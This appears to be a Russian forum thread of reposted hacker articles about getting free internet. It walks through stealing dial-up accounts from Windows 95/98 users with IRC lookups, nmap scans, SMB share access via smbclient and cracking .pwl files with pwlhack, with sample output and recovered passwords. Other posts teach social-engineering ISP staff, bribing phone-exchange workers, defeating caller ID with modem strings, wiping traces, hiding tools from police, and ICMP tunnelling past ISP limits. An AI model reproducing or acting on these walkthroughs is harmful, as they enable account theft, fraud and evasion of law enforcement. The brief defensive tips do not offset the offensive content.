номер тома: 2247-15D0 Содержимое каталога Е:\WIN95 ANDREY PWL 730 02-05-99 10:31p ANDREY.PWL 1 файл(а,ов) 730 байт 0 каталог(а,ов) 287,997,952 байт свободно E:\WIN95›copy andrey.pwl c:\hacking\pwlhack Теперь, после копирования файла с расширением .pwl, хакеру нужно отсоединиться от этого компьютера. Он открывает иконку «Мой компьютер», выбирает иконку E:\121.31.21.87\C нажав правую кнопку мыши. Там жмет «Отсоединить». Что теперь? А теперь он берет программу pwlhack (newdata2.box.sk/neworder/crackpwd/pwlhck32.rar) и с помощью нее расшифровывает добытый файл andrey.pwl. C:\HACKING\PWLHACK›pwlhack.exe /list andrey.pwl andrey (C) 17-Apr-1998y by Hard Wisdom «PWL’s Hacker» v3.0 (1996,97,98) Enter the password: File ’ANDREY.PWL’ has size 730 bytes, version [NEW_Win95_OSR/2] for user ’ANDREY’ with password ’’ contains: -[Type]-[The resource location string]--------------[Password]- Dial X *Rna\Соединение с lamerishe\L5tRe fsa3Xfa12 -------------------------------------------------- ------------- Indexed Entryes: 1; Number of resources: 1. Настает кульминационный момент! Итак, теперь с помощью аккаунта, добытого у «чайника», хакер может лазить по просторам всемирной паутины Интернет. А вот и сам аккаунт: Имя пользователя: L5tRe Пароль: fsa3Xfa12 Если у данного провайдера можно посмотреть статистику прямо из Интернета, то, обычно, хакеры посещают сайт провайдера (в нашем примере www.lamerishe.ru) и смотрят, сколько осталось денег на счету у пользователя и в какое время он обычно находится в Интернете. Кстати, телефоны модемных пулов также можно узнать на сайте у провайдера. :) Существует еще несколько иных способов, таких как использование троянов Netbus1.0, Netbus Pro 2.0, BackOrifice и т.д. Самый простой из всех способов заключается в том, что, зная IP-адрес с открытыми сетевыми ресурсами, можно соединиться с компьютером, нажав на Пуск, выбрав «Поиск компьютера» и указав IP-адрес. «Все. Систему я понял. Теперь объясни-ка мне, как устранить лазейку и защитить себя от непрошеных гостей?» - скажешь ты. Хорошо. Для защиты от описанной выше дырки тебе будет необходимо отключить привязку (службу доступа к файлам и принтерам) от контроллера удаленного доступа (лезь в «Панель управления» -› «Сеть»), а в Windows NT нужно запретить службу Server в Remote Access WAN Wrapper. Но от НетБаса, БэкОрифиса и подобных троянов это тебя не спасет. А вот чтобы не подхватить трояна, во-первых, никогда не подпускай никого к своему компьютеры со всякими дискетками, а, во-вторых, никогда не запускай у себя на компе никаких прог, в которых ты хоть на грамм сомневаешься. Последним хакерским способом по рассылке троянов был массовый спаминг с хоста microsoft.com, где в каждом письме лежал якобы патч к 4-му IE. Ну, а что этот «патч» делал, я думаю, ты уже догадался. :)

Andrew: ::: Безопасность вашего аккаунта ::: Аккаунт – имя пользователя и пароль, который используется для входа в “Internet”. Ни для кого не секрет, что сегодня все чаще хакеры, используя всяческие ухищрения, воруют в сетях бюджеты “чайников”. Пользователи, которым лень задуматься о безопасности, суждено расплачиваться по правилам, установленными беспредельщиками всемирной паутины. Вы платите деньги, а хакер эти деньги использует, причем использует с выгодой для себя. На одном таком пользователе он выигрывает еще десять таких же. То, что он делает, сам он не может назвать воровством. Наша цель – дать понять, как хакеры “вытаскивают” из под вашего носа ваши бюджеты. Тема пойдет о пользователях, которые установили себе операционную систему Windows95/98. Доверьтесь нашей статье, иначе вы окажитесь одним из тех, кого в виртуальном мире называют ламерами. Итак, глубокая ночь, Вы решили побродить по просторам Всемирной Паутины. Вы запускаете свой “Dialer”, заполняете форму для соединения и нажимаете на “Connect”. Вы в Интернете. А тем временем…. Хакеры используют довольно не сложный способ вытаскивания вашего бюджета. Все, что им нужно – терпение. Поверьте, эта черта хакера есть у всех. Итак, с помощью сканера (nmap), программы nat, программы-клиента (smbclient), и программы взлома pwl-файлов - хаккер может проверить ваш компьютер на наличие открытых сетевых ресурсов, соединиться с ним и получить нужную ему информацию, которая находится у вас на жестком диске. Довольно тривиально, правда? Давайте рассмотрим действия хакера вплотную. Итак, в качестве провайдера мы выберем выдуманный нами “www.junk.com”. Довольно часто, жертву находят на каналах знаменитого IRC. Для начала взломщику надо узнать, находится ли пользователь, который пользуется услугами провайдера “JUNK”, на IRC. В строке “Status” он вводит команду: /who *.junk.com #RUSSIAN Andrey H andrey@dialup-28059.junk.com :0 hello. *.junk.com End of /WHO list. Мы видим слово “dialup” (удаленный доступ), которое находится возле “собачки”. Не долго думая, хакер узнает его IP-адрес, который понадобится для поиска таких же пользователей, которые пользуются “удаленным доступом”: /dns Andrey *** Looking up dialup-28059.junk.com *** Resolved dialup-28059. junk.com to 121.31.21.10 Итак, узнав IP-адрес пользователя, который пользуется услугами “удаленного доступа”, взломщик сканирует IP-адреса, которые в данный момент находятся в сети (в режиме “online”). evil# nmap –o junk.result -P 121.31.21.* Результат сканирования перенаправляется в файл junk.result: -------- Starting nmap V. 1.49 by Fyodor (fyodor@dhp.com, www.dhp.com/~fyodor/nmap/) Host dialup-28005.junk.com (121.31.21.5) appears to be up. Host dialup-28009.junk.com (121.31.21.9) appears to be up. Host dialup-28012.junk.com (121.31.21.12) appears to be up. Host dialup-28021.junk.com (121.31.21.21) appears to be up. Host dialup-28029.junk.com (121.31.21.29) appears to be up. -------- Мы видим, что довольно просто узнать диапазон IP-адресов, которые могут быть подвержены взлому. Если учесть тот факт, что каждый второй пользователь использует операционную систему Windows95/98, можно с уверенностью сказать, что большинство компьютеров подвержены взлому. Итак, после сканирования злоумышленник проверяет каждый IP-адрес (компьютер) на наличие открытых сетевых ресурсов (или иначе говоря – “shares”) с помощью программы проверки сети – “NAT”. evil# nat 121.31.21.9 [*]--- Checking host: 121.31.21.9 [*]--- Obtaining list of remote NetBIOS names [*]--- Remote systems name tables: ANDREY THEDOMAIN ANDREY [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: ANDREY [*]--- CONNECTED with name: ANDREY [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Wed May 6 16:05:50 1998 [*]--- Timezone is UTC+4.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: YELTCIN [*]--- CONNECTED with name: YELTCIN [*]--- Attempting to establish session [*]--- Obtained server information: Server=[ANDREY] User=[] Workgroup=[THEDOMAIN] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------------- ------ ------------ C Disk: Default share IPC$ IPC: Remote IPC [*]--- Attempting to access share: \\ANDREY\ [*]--- Unable to access [*]--- Attempting to access share: \\ANDREY\C [*]--- WARNING: Able to access share: \\ANDREY\C [*]--- Checking write access in: \\ANDREY\C [*]--- WARNING: Directory is writeable: \\ANDREY\C [*]--- Attempting to exercise .. bug on: \\ANDREY\C Итак, программа NAT показывает нам, что открыт доступ к сетевому ресурсу, а именно к диску “C:”. “Able to access share: \\ANDREY\C” Все очень просто. Теперь злоумышленник соединяется с вашим копьютером, чтобы затем добраться до интересующей его информации. Как правило, целью является ваш бюджет (в 99 случаях из ста). Соедениться с вашим компьютером позволяет программа smbclient (из пакета Samba). evil# smbclient ’\\ANDREY\C’ -U ADMINISTRATOR -N -I 121.31.21.9 -N – без запроса пароля. -U ADMINISTRATOR – имя, используемое при соединении. Теперь, когда хакер находится в вашем комьютере, есть шанс, что он получит то, что искал – ваш бюджет, который вы используете для входа в Интернет. Ваш бюджет хранится в зашифрованном виде в файле с расширением pwl. smb› ls *w WINDOWS D smb› cd windows smb› ls *.pwl andrey.pwl smb› get andrey.pwl Злоумышленник копирует файл, в котором находится ваш бюджет, после чего покидает ваш компьютер. Что он делает дальше? – спросите вы. Далее в дело вступает программа под названием pwlhack, которая расшифровывает содержимое бюджета. C:\HACK\WIN95›pwlhack.exe /list andrey.pwl andrey (C) 17-Apr-1998y by Hard Wisdom «PWL’s Hacker» v3.0 (1996,97,98) Enter the password: File ’ANDREY.PWL’ has size 1124 bytes, version NEW_Win95_OSR/2 for user ’ANDREY’ with password ’’ contains: -[Type]-[The resource location string]--------------[Password]- Link OFFICE\D OFFICE veritas Dial X *Rna\Соединение JUNK\ Fd31Tta X4b9o93p -------------------------------------------------- ------------- Indexed Entryes: 1; Number of resources: 2. Fd31Tta – ваше регистрационное имя. X4b9o93p – пароль. Проделав столь несложную операцию, хакер делает запись о вашем аккаунте. Как правило, добычу используют для доступа в Интернет за Ваш счет ;) Поясню еще одну деталь: Link - подключенный диск (удаленный сервер для контроля, принтер) в сети. Dial - удаленные “дозвоны” с помощью модема. Итак, Вы стали неуверенны в себе? У Вас появился повод для размышленя? Вот несколько советов, которые я могу вам дать: 1. После заполнении формы (“Имя пользователя” и “пароль”) НЕ ставьте галочку в поле “Сохранить пароль”. По возможности наберайте ваше регистрационное имя и пароль при соединении. Для этого необходимо поставить галочку в “Выводить окно терминала после набора номера” (“Свойства”-“Настройка…” - “Параметры” – “Выводить окно терминала после набора номера”). 2. Поставьте пароль на свой компьютер. При установке Windows 95/98 под сеть, вам предлагают поставить пароль. 3. Необходимо отключить привязку “Служба доступа к файлам и принтерам” от “Контроллера удаленного пользователя”. 4. Переходите на *NIX, наконец! Я вам рассказал только один из старых методов используемых хакерами в наши дни. Сейчас, чтобы не тратить свое время, хакеры придумали программы-скрипты, которым достаточно указать диапазон IP-адресов. Эти программы автоматически ищут предпологаемого пользователя, у которых открыт доступ к сетевым ресурсам. Задумайтесь о безопасности ваших данных. Может быть, хакера не заинтересует ваш бюджет… 2 ISP: Вам приходилось часто выслушивать от пользователей что-то вроде: Почему у меня истекли часы, когда я лазил всего пару раз? ;)

Andrew: !!! Защита от АОНа !!! (P.S.Читать от начала до конца!!!) «В связи с тем, что в разделе наших статей нет текстов посвященных раскрытию данной темы, я попробую коротко, но достаточно полезно ответить вам на поставленный вопрос. Эта тема, будучи самой актуальной темой российского интернета, будет всегда волновать тысячи и тысячи людей, пользующихся несанкционированным доступом в сеть. Главной проблемой в этом деле является неопределённость. Не имея ни малейшего представления об устройствах телефонной связи твоего провайдера ты лезешь в интернет, абсолютно не зная что в данный момент происходит на линии. Тщательно пытаешься вслушиваться в скрип модема при соединении, как всегда ничего не понимаешь, в течении нескольких секунд размышляешь:» А стоит ли именно сейчас, когда я итак уже на кипеше?», и, в силу человеческой любознательности и чисто русской страсти к халяве, продолжаешь процесс аутентификации. Глубокой ночью ты вяло отползаешь от компьютера и идёшь спать, ложишься в кровать, пытаешься уснуть, но ничего не получается - в голове одно, «что ждёт меня завтра? А вдруг я спалился…». Ты встаешь с кровати, расковыряв блок достаешь винчестер, прячешь его, снова ложишься спать… Но на душе ещё тревожнее. Ты берешься за распухшую от забот голову, ты чувствуешь опасность и предстоящие неприятности… Кое-как успокоив себя, ты с трудом засыпаешь. Переведи дыхание. Ответь мне на один вопрос. Знакомая ситуация? Не про тебя ли это написано? Полагаю, в 99 случаях из 100 ответ будет утвердительным. А как же иначе. Всё это лишь лирическое отступление, которое должно было заставить тебя прочувствовать ту атмосферу, в которой и ты и сотни тысяч россиян находятся ежедневно и еженочно. Итак, поставлю вопрос и буду поэтапно на него отвечать. » Как сделать так, чтобы АОН ( Автоматический Определитель Номера ) провайдера не определил номер моего телефона». Если ты задаешь мне такой вопрос, значит тебе не ведомы базовые знания в области фрикинга, соответственно, ты не занимаешься боксингом, соответственно не имеешь дела с блубоксом и телефонными линиями. Не сложно догадаться, что все твои дела творятся с домашнего компьютера и именно это тебя и пугает. С чего тебе начать? Во-первых, нужно установить сам факт присутствия АОНа и как следствие, определение твоего номера. Способов богатое множество. Нужно отметить, что из разных соображений провайдер имеет пулы как с АОНом, так и без него. Всё это опять же для социальных махинаций со стороны самого провайдера. Для начала, достаточно выяснить перечень телефонных пулов провайдера и с помощью звонка с телефона попытаться определить наличие АОНа. Если после первого гудка и щелчка подъема модема будет звучать характерный сигнал ( 1 пика обычно, количество сигналов зависит от количества запросов на АТС ), то это открытый АОН. Если сигналов нет, то спешить не стоит. Очень советовал бы, воспользовавшись всё тем же социальным инжинирингом, обратиться в офис провайдера. Там, в образе сильно заинтересованного в их услугах потенциального клиента можешь подробно расспросить о всех волнующих тебя темах. Т.е наличие АОНов, точность их определения, наличие чистых пулов и т д. Постоянно перемещаясь из города в город мне периодически приходится заниматься этим. Разумеется миловидные девушки и 18-тилетние юноши, сидящие в офисе как правило сказать ничего путного не могут, кроме основных тезисов. Попытай их немного, понадойдай им. Возьми несколько прайс листов, демонстративно почитай их. Снова приставай к ним. Делай это до тех пор, пока их некомпетентная голова не распухнет и не предложит тебе обратиться к администраторам и службе поддержки - это и должно быть целью твоего похода. Стоит изобразить из себя человека немного разбирающегося в текущих темах, и неимоверно гордящегося этим, т е. ты будешь достаточно крут и дерзок с обитателями офиса и полным чайником в диалоге с службой технической поддержки, именно это тебе и нужно. Твои ложные поверхностные знания будут заставлять их чувствовать достаточно комфортно в разговоре с тобой, т е. ощущение того, что в них нуждаются, да ещё такие зелёные ребята, будет позволять им раскрываться всё сильнее и сильнее. Любое лишнее слово может навредить общему делу. Не стоит в вопросах выходить на их уровень. Это их утихомирит и в некоторых случаях насторожит. Скажи, что из обилия услуг провайдеров в этом городе тебя привлёк именно их провайдер. Что неслыханная популярность их услуг распространилась даже в других областях, благодаря качественной связи, низким тарифам, обилию сервисов, и самое главное, безопасности. И т.д. Т.е. таким образом ты разогреваешь его, подчёркиваешь чёткое выполнение его работы, раздеваешь и кладёшь на стол ;))). Данный метод всегда позволяет мне быть в курсе всех событий, а также знать всё то, что меня ждёт и может меня ждать. Несомненно следует подробно расспросить о наказаниях взломщика, в случае его виновности, об их АОНах, насколько надёжны они во всех отношениях, не было ли случаев хищений паролей. Разумеется в силу естественных причин ты будешь пролечен темами, которые по их словам на 100% исключают возможность взлома. Само собой тебе никто не скажет, что их клиентов е**т в ж**у все кому не поподя, это просто на просто подорвёт их авторитет, соответственно раскрытие таких взломов являются конфиденциальной информацией со стороны провайдера. Следует сделать акцент на то, что ты очень волнуешься за судьбу своего будущего аккаунта, так как у тебя уже был горький опыт. А точнее, какой-то негодяй, воспользовавшись неизвестными тебе программами, украл пароль в интернет. Именно «пароль в интернет», рабочий термин рядового чайника. Подобными терминами ты полностью располагаешь его к себе. Искренняя заинтересованность всегда поможет тебе дойти до тех тем, которые просто не реально обсудить с системным администратором. Разумеется тебе будут названы использованные программы, ты со священным трепетом обязательно попросишь рассказать о том, как от них предостеречься, так как не так давно твой одноклассник/одногруппник/коллега по работе пострадал подобным образом и насколько ты помнишь именно от одной из этих программ. Т. е. сочетая конкретные вопросы безопасности с вопросами интересующими тебя на самом деле ты доходишь до самого главного. Выясняешь, берешь уже у технической поддержки прайс-листы, благодаришь, перед уходом задаешь несколько скоротечных вопросов, включая часы работы офиса и когда лучше вылезать в интернет, затем с чувством душевного удовлетворения уходишь. Если в офисе клиентов вообще нет, то желательно посетить их визитом в компании друзей, включая девушек. Это снимает какие-либо опасения со стороны обитателей офиса. З.Ы. Не стоит заводить задушевных разговоров отличных от профессиональной темы с девушками работающими в офисе, как бы она тебе не понравилась. Это инжиниринг, не пикап. Однажды я таким образом чуть не спалился. Разумеется все служащие предупреждены о том, что информация их дела не имеет права выходить из стен учреждения. Т.е. таким образом ты открыто завязываешь дружбу с одним из служащих. Плюс ко всему мужики в офисе из природных причин считают её частной собственностью, на которую ты посягаешь. В моём случае рядом оказался её жених ( которого, как мне показалось, она ни во что не ставила и мило беседовала со мной ), который в процессе нашей оживлённой беседы нервно перетаптывался у двери, и, в тот момент, когда я уже решил, что всё идёт так, как надо, попросил меня оставить девушку в покое, объяснив мне то, кем он для неё является. Ненавидел меня он в тот момент как фашиста, но смелости хватило лишь на то, чтобы попросить удалиться. Естественно после сложившихся обстоятельств мне не удалось бы раскрутить их на откровенные разговоры. Уточнив условия договора, с прайсом в руках я вышел на улицу. Взял у смазливой мордашки телефон, но звонить ей, возможно к её разочарованию, не стал. ) Что нужно сделать дальше. Если есть возможность воспользоваться официальным аккаунтом, то войдя в интернет достаточно обратиться к серверу статистики, где значатся все сеансы комутированного доступа. Среди значений названия хоста, IP ,etc , ты найдёшь раздел, где в случае его присутствия АОН пишет определённый номер. Если значение в опции отсутствует - номер не определён, т е. служба поддержки првайдера не может самостоятельно выяснить номер твоего телефона, но имеет полное право обратиться к службам, а те к твоей АТС, в логах которой хранятся все номера, с которых абонент звонил когда угодно и куда угодно. Это их работа. Набрав номер, по линии передаётся сигнал на АТС, далее на их скрытые АОНы до определения номера, после определения номера АТС подаёт сигнал на вызываемую линию, с ним подаётся 300вт вследствие чего раздаётся звонок. Отсюда следует, что зная день и время несанкционированного проникновения в интернет провайдер с этими данными обращается на АТС, а те в своё время сравнив данные со своими вычисляют номер твоего телефона. Что можно придумать в данном случае. Пожалуй, лучшим выходом будет поиск связей с сотрудниками твоей АТС, или же с людьми, которые в свою очередь имеют связи с сотрудниками АТС. Дело не хлопотное, главное всегда вовремя подкармливать и подпаивать твоих новых друзей с АТС. Если таковых не имеется ты можешь попытаться сбить определение АОНом твоего номера самостоятельно со своего компьютера. Я думаю, что этим вопросом нужно заниматься подробно и находить решения исходя из модели и прошивки модема. В принципе если модем обладает командами быстрого набора импульсных номеров все должно работать вполне приемлемо. Рекомендую обзавестись модемом Courier с прошивкой Дягилева. Описанные ниже действия целиком рассчитаны на него, на прошивки avc ( в принципе с данной прошивкой инициализацию вообще лучше прописать как ATZ, так как именно стандартная инициализация ATZ активирует быстрый набор и антиаон, т .е при её изменении отключается быстрый набор номера и антиаон блокируется ), idsdl. Смысл заключается в манипуляции процессов в телефонной линии путём модификации инициализации модема. Таким образом все корректировки локализуются в разделе Dial-Up Networking › настройки соединения › дополнительные параметры › инициализация модема. Удаляешь стандартную инициализацию ( например ATZ ) и внимательно читаешь данную статью. Стандартный модем имеет команды ошибок класса MNP 2-4 и V.42. Факс команды совместимые с EIA классом 1 и классом 2. А также компрессор MNP 5 и V42 бита для данных сериальных, нечётных, бинарных, асинхронных 7 и 8 битовых данных, даже данные 10 битовой длины. Перед тем, как вносить туда какие-либо изменения я уточню, что именно обозначают различные значения вносимые в строку инициализации модема. Все эти и многие другие команды доступны в начале мануала, который прилагается к модему. На досуге стоит почитать Basic AT Commands, Voice commands, Error Correction Commands, а также изучить команды MNP 10. Здесь я расскажу про самые необходимые команды и как именно они могут помочь нам в решении проблемы с АОНом. Итак: Команда &f1 - команда вызова профиля настройки прошивок по умолчанию. В данном случае вызывается профиль конфигурации #1, так же существует профиль конфигурации 0 ( нечетные установки ), вызываемый командой &f0. Команда +s1 - команда задержки времени между набором цифр номера. Т.е. количество милисекунд на которые прерывается модем после набора определённой цифры и перед набором следующей цифры за ней. Команда +s8 ( s2 ) - команда присвоения паузы при наборе. Значение каждого из параметров вводится по схеме: команда=значение. Т.е чтобы, например во время набора номера произошла задержка на 17 секунд инициализация должна выглядеть следующим образом: at********s17=1. В данном случае на звёздочки заменены значения других параметров. Что должна включать в себя отредактированная строка инициализации. Помимо стандартной инициализации в строку вносятся значения вышеописанных команд. Т. е. новая строка будет иметь вид: at+ команда профайла+задержка набора цифр+присвоение значения паузы. Например: если ты хочешь задержать набор цифр вызова на 100мс и временно прервать вызов при определении номера на 4 секунды ( допустим в твоём случае именно столько занимают 2 обращения АОНа к АТС )( !!! пауза должна быть как можно меньше !!!), то инициализация вместо стандартного ATZ должна будет выглядеть следующим образом ( значения целиком зависят от свойств вашей АТС): at&f1+s1=100+s8=4&w Для idsdl: at&f1s77=100s76=4&w В данном случае мы установили значенне задержки между набором цифр = 100. Это всего лишь наглядный пример. Значение возможно повышать до 127, т .е до времени стандартного набора ( 70 ). Значение 0 соответственно так же отключает задержку. Т .е перечёркивает всё то, к чему мы стремимся. Я всегда полагаюсь на 10-15мс. Это примерно равно шести нолям в строке номера телефона. Кстати, об этом ниже. Новые АТС сами по себе позволяют номеру набираться быстрее, значит значения в инициализации должны соответственно уменьшаться в разницу с набором предыдущей АТС. Теперь о самом номере. В строке номера пишешь p+сам_номер+,,000000. Также можно выставить запятую после каждой цифры в номере пула. Например для номера 222 22 22 запись имеет следующий вид: p2,2,2,2,2,2,2,,000000 или p2222222,,000000. Таким образом при обращении к АТС происходит дополнительный быстрый набор шести нолей, которые сбивают реальный номер телефона, т. е. быстрый нобор активирует антиаон модема. После каждого сеанса удаляй информацию о соединениях из реестра: HKEY_CURRENT_USER›RemoteAccess›Profile- информация о логине соединения. HKEY_CURRENT_USER›NETwork›Recept - информация о подключённых рессурсах в интернет. Удачи.»

Andrew: Если вдруг пришли менты!!! Автор: ACID Ghost (Pals Team) Каждый кул хацкер, ламер, юзверь лазающий в инете у себя дома мечтает о халявном инете, о круглосуточном халявном инете. Для некоторых эта мечта неисполнима, а некоторые уже давно юзают халяву на полную катушку. Вот мы и поговорим с тобой о том, что делать если ты раздобришь великого бога хаки и он тебе пошлет ламера с инетом, у которого ты этот инет и сопрешь:). Или это будет не ламер, а какая-нибудь организация с анлимитом. Короче, прихватизировал ты этот аккаунт и стал с довольной лыбой сидеть, чатится и мп3 качать, а они тебя пропалили, вызвали мусоров(:-E), которые, придя и прописав тебе первичные и вторичные ДНС’ы, забрали у тебя твой копм и дали тебе 3 года, другими словами по 273 загремел:-[. Могут штрафануть на 200 - 500 минимальных окладов, а за енти бабки ты купил бы себе анлимит на 2 - 3 месяца. Зато есть и положительные стороны. На всю страну по телеку передадут, что поймали хакера и посадили и другим пример будет, чтоб не тырили инет у честных граждан. Это не есть гуд и надо это профиксить:) Будем показывать ментам мягкие части твоего тела. Делаем так: Лезь в инет и ищи программку под названием PGP. (WWW.PGP.COM) Лезь туда же и ищи доки и разную инфу по этой же проге. Подожди лесть в асталависту за кряком - прога фриварная. Это хорошо. Читаем инфу, что нашли. Ставим прогу. Шифруем весь хакерский софт. (За хакерский софт тебя как раз могут поиметь, если найдут). }{хакерский софт: твои нюкеры, сканеры, трояны, крякеры инета и прочее... Можно создать специльный диск с шифрованной файловой системой с помощью проги PGP disk. И туда все проги сложить. Если кто не знает, то с помощью этой проги можно шифровать файлы, затирать файлы с диска, шифровать мыло и сообщения аси. Вот вы и продвинулись вперед. В крайнем случае закинте всю хакрскую утварь на бусплатный Ftp. P.S. Если ты не смог разобраться, как работает эта прога (самая лучшая защита из всех крипто систем), то не воруй инет ни откуда и проверь не сперли ли твой собственный инет:)

Andrew: ЧИТАТЬ ВСЕМ!!!!! Статья : Халявный интернет через протокол ICMP «Мам, дай денег на Инет, а?» Тебе, случаем, это не знакомо? О-ох, ну естественно, как я мог сомневаться :). Так вот, вполне возможно, что после прочтения этой статьи тебе более не придется говорить таких слов, одновременно с этим делая ангельское лицо и невинную улыбку :). Как это ни странно, но в осуществлении цели по добыче халявного Инета тебе помогут... сами провайдеры. Однако оговорюсь - никакого криминала, давления на психику и прочего в данном способе нет. Все абсолютно законно и легально. Интересно, правда? Кратко о технологии Большинство провайдеров предоставляют на халяву гостевой доступ. Т.е. они дают тебе доступ в Интернет, однако сильно ограничивают тебя, иногда даже позволяют посещать только их собственный сайт. Но, как говорится, нет худа без добра: иногда случается так, что возможность пинговать произвольный IP-адрес остается (провайдер не обрубает ICMP-пакеты). Вот здесь-то и кроется их главная ошибка: что нам мешает передавать в ICMP-пакетах свои данные? Правильно - ничего :). Возникает только одна проблема - техническая реализация данной задумки. Однако не все так призрачно и туманно, как может показаться на первый взгляд: нашлись люди, которые напряглись и сделали все за нас. Как ты уже, наверное, догадался, далее пойдет рассказ о некой программе, которая поможет нам использовать оплошность админов провайдера :). Называется она X-Proxy скачать можно в разделе Download Как все устроено. Для начала тебе понадобится доступ на компьютер с полноценным доступом в Интернет и Windows’ом. Как добыть такой доступ: спрашивай друзей, пытайся ломать сайты, но я не смогу помочь, ты уж извини :). Если все присутствует, то дело за малым - настроить программу. Работать с программой просто: ты устанавливаешь на сервере серверную часть X-Proxy, а клиентскую у себя. Далее следует быстрый процесс конфигурирования и собственно наслаждение результатами. Принцип работы данного ICMP-прокси заключается в следующем: клиентская часть открывает на прослушивание заданный порт, а ты в это время во всех своих браузерах и прочих программах выставляешь опцию «использовать прокси», задав локальный IP и нужный порт. Допустим, ты используешь IE и хочешь зайти на некоторую страничку. Твой браузер подключается к нашему клиенту, говорит ему, какой урл нужно загрузить. Клиент, в свою очередь, формирует ICMP-пакет (в заголовок которого прописывается команда ICMP_ECHOREPLY - ответ на пинг), записывает туда запрос браузера, а потом отсылает его серверу. Сервер, получив этот пакет, читает оттуда запрос и уже перенаправляет его на другую прокси, но уже не наш, а на обычный. Получив ответ от этой прокси, сервер сохраняет все полученные данные в новый ICMP-пакет и отправляет его клиенту, который, в свою очередь, отдает все данные браузеру. И так далее, пока IE не попросит разорвать соединение. Понимаю, запутанно, зато работает :). В итоге провайдер думает, что ты от безысходности решил пропинговать какого-то бедолагу, а ты - наслаждаешься. Итак, с теорией покончили. Перейдем к практике. Добыв X-Proxy и распаковав архив, в каталоге bin ты увидишь два конфига и три exe’шника. Несложно догадаться, что client.conf - конфиг клиента, x-proxy_c.exe - сам клиент, config.exe - конфигуратор, а остальное относится к серверу. Конфигурация Запускаем config.exe. Он задает несколько вопросов. Client name - уникальное имя, которым ты хочешь обозвать свою копию клиента. Вводи любое, но не очень длинное. Server IP address - IP-адрес компьютера, на котором установлена серверная часть X-Proxy, Server password - пароль к серверу. Изначально он - globalmind, однако его можно сменить (для этого нужно перекомпилировать сервер, изначально подредактировав исходный код). Proxy IP address - IP-адрес прокси-сервера, на который будут перенаправляться все запросы (можешь поискать на www.void.ru или где-нибудь еще). Proxy port - порт, на котором висит прокси. Обычно 8080. Все, конфигурация завершена. Конфигуратор обновил файлы *.conf, и X-Proxy готов к работе. Теперь проставь в браузере, чтобы он использовал проксю. Установи адрес хоста localhost, а порт 8080. Сервер Запускаем на удаленной машине x-proxy_s.exe. Появляется небольшое окошко (консоль), в котором отображается весь процесс работы сервера. При запуске в нем выводится текущее время и краткая информация о серверной части - текущая версия (на данный момент - 0.2.2), поддерживаемый протокол (0.2) и куча не нужной тебе информации. Если вдруг при загрузке случится ошибка - ты об этом узнаешь первый :). Изначально сервер поддерживал работу только с одним клиентом, однако в текущей версии количество одновременно обслуживаемых пользователей задается на этапе компиляции. По умолчанию их 50 :]. Однако каждый пользователь может «подключаться» только к одному прокси. Клиент Аналогично с сервером, после запуска файла появляется небольшое окошко, в котором отображается краткое информация о клиенте. Сразу же после запуска клиент пытается установить связь с сервером и выводит информацию о нем - имя/e-mail админа :), приветствие и количество текущих пользователей на сервере. Далее локально открывается порт 8080, на который ожидаются запросы от браузеров/мейлеров и других программ. При получении такого запроса клиент логинится на сервер, посылая ему пароль и свое имя. Если пароль не верен (или сервер перегружен) - выводится соответствующее сообщение. По мере отправки/получения данных в окошке клиента будет выводится множество бессмысленных для тебя слов. Не пугайся, это нормально . Все запросы помещаются в буфер и обрабатываются последовательно, так что если их будет очень много (или коннект будет довольно слабым), возможны небольшие сбои =\. От себя добавлю: в результате долгого тестирования и отлаживания был выставлен наиболее оптимальный, по мнению автора программы, размер буфера. Однако в результате этого скорость передачи данных немного упала . Не стоит также забывать, что программа еще довольно сырая, так что возможны некоторые ошибки при пересылке данных . P.S. Как видишь, даже провайдеры ошибаются, иногда не подозревая, как такие люди, как мы, могут использовать промахи. Кстати, я в начале статьи не зря употребил «вполне возможно»: даже если ты найдешь такого провайдера (их все-таки мало :(), данная система может не сработать из-за низкого качества связи (иногда очень большое число пакетов теряется, а ICMP - это не TCP, здесь обработки ошибок нет). Однако есть надежда, что в последующих версиях X-Proxy данная проблема будет устранена. Как говорится - наука требует жертв! :). Так что не расстраивайся, если что-то пошло не так: в нашей жизни такое сплошь и рядом, и не стоит вешать нос. Итак, если следовать статье, то при помощи X-Proxy ты сможешь пользоваться только HTTP и FTP протоколами. Понятно, что такие ограничения неприятны. Появляются мысли: а как же ICQ, IRC? А все просто! При настройке X-Proxy в серверных параметрах поставь, чтобы редирект был не на обычный proxy, а на socks. Тогда ты сможешь пользоваться любой программой, поддерживающей socks, а таких очень много :). И еще. Это реализация под Win платформу, так что, если ты любитель Unix систем, то пиши мне Удачи тебе!

djyarrr@e-mail.ru: Andrew



полная версия страницы